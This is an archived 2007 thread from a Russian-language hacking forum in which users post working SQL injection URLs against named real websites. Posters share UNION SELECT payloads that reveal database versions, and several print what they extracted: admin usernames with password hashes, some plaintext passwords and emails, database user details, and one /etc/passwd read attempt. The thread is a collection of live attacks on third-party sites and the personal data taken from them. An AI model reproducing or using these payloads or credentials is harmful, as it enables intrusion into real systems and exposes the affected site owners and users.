ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4111  
Старый 18.12.2007, 20:19
Neovild
Познающий
Регистрация: 18.12.2007
Сообщений: 32
Провел на форуме:
614948

Репутация: 86
По умолчанию

Моя первая скуль-инъекция (только неполная; нашел количество столбцов и поле для вывода)
Код HTML:
http://www.softmart.ru/comp/show_prog.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #4112  
Старый 18.12.2007, 22:04
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Код HTML:
http://www.expert-bdd.com/arhiv.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15/*
Код HTML:
http://www.expert-bdd.com/arhiv.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat(name,0x3a,password,0x3a,email),12,13,14,15+FROM+admins/*
Митко:cf9fb3872eced13b0deceb1eb6595442:
Кирил:646e5563343543ac1f3871e4bb2d33f7:cyril@ intermedia.bg:lipa4

Код HTML:
http://www.expert-bdd.com/arhiv.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,LOAD_FILE('/etc/passwd'),12,13,14,15/*

Последний раз редактировалось ~EviL~; 18.12.2007 в 22:19..
 
Ответить с цитированием

admin:d23d8b79f575bcc0eedfb8c4e2f13540:repz
  #4113  
Старый 18.12.2007, 23:18
JIyka
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018

Репутация: 25
Отправить сообщение для JIyka с помощью ICQ
По умолчанию admin:d23d8b79f575bcc0eedfb8c4e2f13540:repz

http://www.a2k.org.ua/news.php?id=-1567+union+select+1,2,3,4,concat_ws(0x3a,user,pass word),
6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,
27,28,29,30,31,32,33,34,35,36,37,38+from+users+lim it+7,1/*


admin:d23d8b79f575bcc0eedfb8c4e2f13540:repz
privacy:21cec257feb15bcc84e0acd5b0773883rivacy
irina:e67ccf0c31412f5905978cd805a6a432:rf2005
editor:d7d2105b3178dea4921b7748bc4e71eb:maidan
 
Ответить с цитированием

  #4114  
Старый 19.12.2007, 01:19
JIyka
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018

Репутация: 25
Отправить сообщение для JIyka с помощью ICQ
По умолчанию

http://www.mywatches.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4/*

5.0.45-log:u80484@10.10.223.245:u80484
 
Ответить с цитированием

  #4115  
Старый 19.12.2007, 01:53
Neovild
Познающий
Регистрация: 18.12.2007
Сообщений: 32
Провел на форуме:
614948

Репутация: 86
По умолчанию

2 часа сидел и никак не подобрал столбцы
Код HTML:
http://www.rabotamania.ru/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),system_user(),database()),2,3,4,5,6,7,8,9,10+from+rabotamania_pages/*
Код HTML:
http://studyport.info/viewdetails.php?id=-1+Union+select+1,concat_ws(0x3a,version(),user()%20,database()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
 
Ответить с цитированием

  #4116  
Старый 19.12.2007, 14:45
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Готовлю большую заготовку по Франции...

Пока только мелочь...

yack.fr
Код:
http://yack.fr/yack/index.php?mainFrame=actu.php%3Fid_actu%3D-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10/*
4.0.24_Debian-10sarge2-log:user_2657:user_2657@192.168.1.151
Таблицы:
Код:
actu
actu_theme
categorie
devis
document
dpt
famille
marque
part_dpt
partenaire
produit
reference
secteur
Чёт ни админских, ни юзерских таб не нашёл ...

promo-web.org
Код:
http://www.promo-web.org/forum/viewtopic.php?TopicID=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4/*
4.1.22-standard : promoweb : promoweb@localhost
 
Ответить с цитированием

  #4117  
Старый 19.12.2007, 15:01
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

http://www.protruck.ru/catalogue.php?gid=80+union+select+1,2,3,4,5,6,7,co ncat(srv_login,0x3a,srv_passw),9,0,1,2,3+from+prot ruck_users/*
5ая
admin:12345
 
Ответить с цитированием

  #4118  
Старый 19.12.2007, 15:08
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

www.prosambo.com
Код:
http://www.prosambo.com/index.php?razdel=news&id=-28+UNION+SELECT+1,2,3,4,5,6,version()/*
Сайт самбистов...(не подумайте что я не люблю спорт... =) )
5.0.45

vostokmedia.com
Код:
http://vostokmedia.com/news.details.php?id=-7269+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15/*
Сайт Информационного агенства "Восток Медиа"
4.1.22-standard-log


www.gazeta-vv.ru
Код:
http://www.gazeta-vv.ru/?action=arh&number=98&id=-667+UNION+SELECT+1,2,3,4,concat(user,0x3a,password),6,7,8,9,10,11,12,13+from+mysql.user/*
Сайт какой-то газеты...
4.0.18

user:agata
hash:4462ead17d29e68b


www.lyapis.com
Код:
http://www.lyapis.com/articles.php?id=-127+UNION+SELECT+1,2,3,4,5,6,7,8,9/*
Официальный сайт Ляписа Трубецкого
4.1.22-standard


sovadmin.gomel.by
Код:
http://www.sovadmin.gomel.by/news.php?id=-842+UNION+SELECT+1,version(),3,4,5,6,7,8,9/*
Официальный сайт администрации Советского района г. Гомеля
4.0.18

Последний раз редактировалось Iceangel_; 19.12.2007 в 15:51..
 
Ответить с цитированием

  #4119  
Старый 19.12.2007, 17:48
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.camellia-flowers.ru/news.php?id=-16+union+select+1,VERSION(),3,4,5,6/*
 
Ответить с цитированием

  #4120  
Старый 19.12.2007, 21:45
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.charlotte.ru/?page=item&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10/*

4.1.20/charlotte/charlotte@localhost


http://www.charlotte.ru/?page=item&id=-1+union+select+1,concat_ws(0x2F,login,password,ema il),3,4,5,6,7,8,9,10+from+users+limit+0,1/*

логин/пароль/мейл
Timur/zxcv5/akinshin@diona.ru
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ